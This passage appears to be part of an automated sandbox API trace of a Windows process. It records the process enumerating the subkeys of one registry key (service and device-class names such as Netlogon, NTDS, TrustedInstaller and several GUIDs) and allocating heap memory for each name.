lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="File system", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.824] lstrlenW (lpString="File system") returned 11 [0174.824] GetProcessHeap () returned 0x4a0000 [0174.824] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x18) returned 0x4b5568 [0174.824] GetProcessHeap () returned 0x4a0000 [0174.824] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5588 [0174.824] RegEnumKeyExW (in: hKey=0x78, dwIndex=0xa, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Filter", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.825] lstrlenW (lpString="Filter") returned 6 [0174.825] GetProcessHeap () returned 0x4a0000 [0174.825] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xe) returned 0x4b5e40 [0174.825] GetProcessHeap () returned 0x4a0000 [0174.825] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b55a8 [0174.825] RegEnumKeyExW (in: hKey=0x78, dwIndex=0xb, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HelpSvc", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.825] lstrlenW (lpString="HelpSvc") returned 7 [0174.825] GetProcessHeap () returned 0x4a0000 [0174.825] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4b5e58 [0174.825] GetProcessHeap () returned 0x4a0000 [0174.825] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b55c8 [0174.825] RegEnumKeyExW (in: hKey=0x78, dwIndex=0xc, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="KeyIso", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.826] lstrlenW (lpString="KeyIso") returned 6 [0174.826] GetProcessHeap () returned 0x4a0000 [0174.826] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xe) returned 0x4b5e70 [0174.826] GetProcessHeap () returned 0x4a0000 [0174.826] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b55e8 [0174.826] RegEnumKeyExW (in: hKey=0x78, dwIndex=0xd, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Netlogon", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.826] lstrlenW (lpString="Netlogon") returned 8 [0174.826] GetProcessHeap () returned 0x4a0000 [0174.826] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x12) returned 0x4b5608 [0174.826] GetProcessHeap () returned 0x4a0000 [0174.826] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5628 [0174.826] RegEnumKeyExW (in: hKey=0x78, dwIndex=0xe, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="NTDS", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.826] lstrlenW (lpString="NTDS") returned 4 [0174.827] GetProcessHeap () returned 0x4a0000 [0174.827] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xa) returned 0x4b5e88 [0174.827] GetProcessHeap () returned 0x4a0000 [0174.827] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5648 [0174.827] RegEnumKeyExW (in: hKey=0x78, dwIndex=0xf, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PCI Configuration", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.827] lstrlenW (lpString="PCI Configuration") returned 17 [0174.827] GetProcessHeap () returned 0x4a0000 [0174.827] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x24) returned 0x4b50d8 [0174.827] GetProcessHeap () returned 0x4a0000 [0174.827] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5668 [0174.827] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x10, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PlugPlay", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.827] lstrlenW (lpString="PlugPlay") returned 8 [0174.827] GetProcessHeap () returned 0x4a0000 [0174.827] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x12) returned 0x4b5688 [0174.827] GetProcessHeap () returned 0x4a0000 [0174.828] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b56a8 [0174.828] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x11, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PNP Filter", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.828] lstrlenW (lpString="PNP Filter") returned 10 [0174.828] GetProcessHeap () returned 0x4a0000 [0174.828] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x16) returned 0x4b56c8 [0174.828] GetProcessHeap () returned 0x4a0000 [0174.828] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b56e8 [0174.828] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x12, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Primary disk", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.828] lstrlenW (lpString="Primary disk") returned 12 [0174.828] GetProcessHeap () returned 0x4a0000 [0174.828] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x1a) returned 0x4b3fa0 [0174.828] GetProcessHeap () returned 0x4a0000 [0174.828] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5708 [0174.828] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x13, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="RpcEptMapper", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.828] lstrlenW (lpString="RpcEptMapper") returned 12 [0174.828] GetProcessHeap () returned 0x4a0000 [0174.829] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x1a) returned 0x4b3fc8 [0174.829] GetProcessHeap () returned 0x4a0000 [0174.829] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5728 [0174.829] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x14, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="RpcSs", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.829] lstrlenW (lpString="RpcSs") returned 5 [0174.829] GetProcessHeap () returned 0x4a0000 [0174.829] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xc) returned 0x4b5ea0 [0174.829] GetProcessHeap () returned 0x4a0000 [0174.829] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5748 [0174.829] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x15, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="sacsvr", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.833] lstrlenW (lpString="sacsvr") returned 6 [0174.833] GetProcessHeap () returned 0x4a0000 [0174.833] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xe) returned 0x4b5eb8 [0174.833] GetProcessHeap () returned 0x4a0000 [0174.833] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5768 [0174.833] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x16, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SCSI Class", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.833] lstrlenW (lpString="SCSI Class") returned 10 [0174.833] GetProcessHeap () returned 0x4a0000 [0174.833] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x16) returned 0x4b5788 [0174.834] GetProcessHeap () returned 0x4a0000 [0174.834] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b57a8 [0174.834] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x17, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="sermouse.sys", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.834] lstrlenW (lpString="sermouse.sys") returned 12 [0174.834] GetProcessHeap () returned 0x4a0000 [0174.834] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x1a) returned 0x4b3ff0 [0174.834] GetProcessHeap () returned 0x4a0000 [0174.834] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b57c8 [0174.834] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x18, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SWPRV", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.834] lstrlenW (lpString="SWPRV") returned 5 [0174.834] GetProcessHeap () returned 0x4a0000 [0174.835] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xc) returned 0x4b5ed0 [0174.835] GetProcessHeap () returned 0x4a0000 [0174.835] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b57e8 [0174.835] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x19, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System Bus Extender", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.835] lstrlenW (lpString="System Bus Extender") returned 19 [0174.835] GetProcessHeap () returned 0x4a0000 [0174.835] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x28) returned 0x4b6270 [0174.835] GetProcessHeap () returned 0x4a0000 [0174.835] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5808 [0174.835] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x1a, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TabletInputService", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.836] lstrlenW (lpString="TabletInputService") returned 18 [0174.836] GetProcessHeap () returned 0x4a0000 [0174.836] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x26) returned 0x4b62a0 [0174.836] GetProcessHeap () returned 0x4a0000 [0174.836] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5828 [0174.836] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x1b, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TBS", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.836] lstrlenW (lpString="TBS") returned 3 [0174.836] GetProcessHeap () returned 0x4a0000 [0174.836] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x8) returned 0x4b62d0 [0174.836] GetProcessHeap () returned 0x4a0000 [0174.836] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5848 [0174.837] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x1c, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TrustedInstaller", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.837] lstrlenW (lpString="TrustedInstaller") returned 16 [0174.837] GetProcessHeap () returned 0x4a0000 [0174.837] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x22) returned 0x4b62e0 [0174.837] GetProcessHeap () returned 0x4a0000 [0174.837] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5868 [0174.837] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x1d, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="VDS", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.837] lstrlenW (lpString="VDS") returned 3 [0174.837] GetProcessHeap () returned 0x4a0000 [0174.838] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x8) returned 0x4b6310 [0174.838] GetProcessHeap () returned 0x4a0000 [0174.838] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5888 [0174.838] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x1e, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="vga.sys", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.838] lstrlenW (lpString="vga.sys") returned 7 [0174.838] GetProcessHeap () returned 0x4a0000 [0174.838] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4b5ee8 [0174.838] GetProcessHeap () returned 0x4a0000 [0174.838] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b58a8 [0174.839] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x1f, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="vgasave.sys", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.839] lstrlenW (lpString="vgasave.sys") returned 11 [0174.839] GetProcessHeap () returned 0x4a0000 [0174.839] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x18) returned 0x4b58c8 [0174.839] GetProcessHeap () returned 0x4a0000 [0174.839] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b58e8 [0174.839] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x20, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="vmms", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.839] lstrlenW (lpString="vmms") returned 4 [0174.839] GetProcessHeap () returned 0x4a0000 [0174.839] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xa) returned 0x4b5f00 [0174.839] GetProcessHeap () returned 0x4a0000 [0174.839] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5908 [0174.840] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x21, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="volmgr.sys", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.840] lstrlenW (lpString="volmgr.sys") returned 10 [0174.840] GetProcessHeap () returned 0x4a0000 [0174.840] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x16) returned 0x4b5928 [0174.840] GetProcessHeap () returned 0x4a0000 [0174.840] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5948 [0174.840] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x22, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="volmgrx.sys", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.840] lstrlenW (lpString="volmgrx.sys") returned 11 [0174.840] GetProcessHeap () returned 0x4a0000 [0174.840] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x18) returned 0x4b5968 [0174.840] GetProcessHeap () returned 0x4a0000 [0174.840] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5988 [0174.840] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x23, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WinMgmt", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.841] lstrlenW (lpString="WinMgmt") returned 7 [0174.841] GetProcessHeap () returned 0x4a0000 [0174.841] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4b5f18 [0174.841] GetProcessHeap () returned 0x4a0000 [0174.841] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b59a8 [0174.841] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x24, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WudfPf", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.841] lstrlenW (lpString="WudfPf") returned 6 [0174.841] GetProcessHeap () returned 0x4a0000 [0174.841] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xe) returned 0x4b5f30 [0174.841] GetProcessHeap () returned 0x4a0000 [0174.841] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b59c8 [0174.841] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x25, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WudfRd", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.841] lstrlenW (lpString="WudfRd") returned 6 [0174.841] GetProcessHeap () returned 0x4a0000 [0174.842] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xe) returned 0x4b5f48 [0174.842] GetProcessHeap () returned 0x4a0000 [0174.842] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b59e8 [0174.842] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x26, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WudfSvc", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.842] lstrlenW (lpString="WudfSvc") returned 7 [0174.842] GetProcessHeap () returned 0x4a0000 [0174.842] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4b5f60 [0174.842] GetProcessHeap () returned 0x4a0000 [0174.842] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5a08 [0174.842] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x27, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{36FC9E60-C465-11CF-8056-444553540000}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.842] lstrlenW (lpString="{36FC9E60-C465-11CF-8056-444553540000}") returned 38 [0174.842] GetProcessHeap () returned 0x4a0000 [0174.842] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b6320 [0174.842] GetProcessHeap () returned 0x4a0000 [0174.843] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5a28 [0174.843] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x28, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E965-E325-11CE-BFC1-08002BE10318}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.843] lstrlenW (lpString="{4D36E965-E325-11CE-BFC1-08002BE10318}") returned 38 [0174.843] GetProcessHeap () returned 0x4a0000 [0174.843] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b6378 [0174.843] GetProcessHeap () returned 0x4a0000 [0174.843] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5a48 [0174.843] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x29, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E967-E325-11CE-BFC1-08002BE10318}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.843] lstrlenW (lpString="{4D36E967-E325-11CE-BFC1-08002BE10318}") returned 38 [0174.843] GetProcessHeap () returned 0x4a0000 [0174.843] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b63d0 [0174.843] GetProcessHeap () returned 0x4a0000 [0174.843] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5a68 [0174.843] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x2a, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E969-E325-11CE-BFC1-08002BE10318}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.844] lstrlenW (lpString="{4D36E969-E325-11CE-BFC1-08002BE10318}") returned 38 [0174.844] GetProcessHeap () returned 0x4a0000 [0174.844] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b6428 [0174.844] GetProcessHeap () returned 0x4a0000 [0174.844] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5a88 [0174.844] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x2b, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E96A-E325-11CE-BFC1-08002BE10318}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.844] lstrlenW (lpString="{4D36E96A-E325-11CE-BFC1-08002BE10318}") returned 38 [0174.844] GetProcessHeap () returned 0x4a0000 [0174.844] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b6480 [0174.844] GetProcessHeap () returned 0x4a0000 [0174.844] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5aa8 [0174.844] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x2c, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E96B-E325-11CE-BFC1-08002BE10318}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.844] lstrlenW (lpString="{4D36E96B-E325-11CE-BFC1-08002BE10318}") returned 38 [0174.844] GetProcessHeap () returned 0x4a0000 [0174.844] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b64d8 [0174.844] GetProcessHeap () returned 0x4a0000 [0174.845] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5ac8 [0174.845] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x2d, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E96F-E325-11CE-BFC1-08002BE10318}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.850] lstrlenW (lpString="{4D36E96F-E325-11CE-BFC1-08002BE10318}") returned 38 [0174.850] GetProcessHeap () returned 0x4a0000 [0174.850] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b6530 [0174.850] GetProcessHeap () returned 0x4a0000 [0174.850] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5ae8 [0174.850] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x2e, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E977-E325-11CE-BFC1-08002BE10318}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.850] lstrlenW (lpString="{4D36E977-E325-11CE-BFC1-08002BE10318}") returned 38 [0174.850] GetProcessHeap () returned 0x4a0000 [0174.850] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b6588 [0174.850] GetProcessHeap () returned 0x4a0000 [0174.850] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5b08 [0174.850] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x2f, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E97B-E325-11CE-BFC1-08002BE10318}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.851] lstrlenW (lpString="{4D36E97B-E325-11CE-BFC1-08002BE10318}") returned 38 [0174.851] GetProcessHeap () returned 0x4a0000 [0174.851] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b65e0 [0174.851] GetProcessHeap () returned 0x4a0000 [0174.851] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b5b28 [0174.851] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x30, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E97D-E325-11CE-BFC1-08002BE10318}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.851] lstrlenW (lpString="{4D36E97D-E325-11CE-BFC1-08002BE10318}") returned 38 [0174.851] 